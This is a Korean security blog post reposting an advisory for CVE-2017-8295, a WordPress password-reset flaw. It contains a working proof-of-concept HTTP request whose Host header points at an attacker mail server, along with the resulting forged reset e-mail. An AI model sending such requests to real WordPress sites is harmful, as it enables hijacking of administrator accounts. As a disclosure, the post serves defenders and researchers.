안녕하세요. Security M1S 입니다.
본 포스팅에서는 워드프레스 4.7.4 이하버젼에서의 취약점을 공개하려고 합니다.
CVE2017-8295 로 명명된 본 취약점은 무단으로 패스워드를 재설정 할 수 있는 치명적인 긴급 취약점입니다.
(4.7.4 버젼에서도 동작하는지는 테스팅 해보신분 께서 결과 댓글 부탁드립니다.^^;;)
해당 exploit 상세 안내:
=============================================- Discovered by: Dawid Golunski- dawid[at]legalhackers.com- CVE-2017-8295- Release date: 03.05.2017- Revision 1.0- Severity: Medium/High=============================================Source: https://exploitbox.io/vuln/WordPress-Exploit-4-7-Unauth-Password-Reset-0day-CVE-2017-8295.htmlIf an attacker sends a request similar to the one below to a default Wordpressinstallation that is accessible by the IP address (IP-based vhost):-----[ HTTP Request ]----POST /wp/wordpress/wp-login.php?action=lostpassword HTTP/1.1Host: injected-attackers-mxserver.comContent-Type: application/x-www-form-urlencodedContent-Length: 56user_login=admin&redirect_to=&wp-submit=Get+New+Password------------------------Wordpress will trigger the password reset function for the admin user account.Because of the modified HOST header, the SERVER_NAME will be set tothe hostname of attacker's choice.As a result, Wordpress will pass the following headers and email body to the/usr/bin/sendmail wrapper:------[ resulting e-mail ]-----Subject: [CompanyX WP] Password ResetReturn-Path: <wordpress@attackers-mxserver.com>From: WordPress <wordpress@attackers-mxserver.com>Message-ID: <e6fd614c5dd8a1c604df2a732eb7b016@attackers-mxserver.com>X-Priority: 3MIME-Version: 1.0Content-Type: text/plain; charset=UTF-8Content-Transfer-Encoding: 8bitSomeone requested that the password be reset for the following account:Username: adminIf this was a mistake, just ignore this email and nothing will happen.To reset your password, visit the following address:-------------------------------As we can see, fields Return-Path, From, and Message-ID, all have the attacker'sdomain set.The verification of the headers can be performed by replacing /usr/sbin/sendmail with a bash script of:#!/bin/bashcat > /tmp/outgoing-email
Download 버젼:
41963.txt
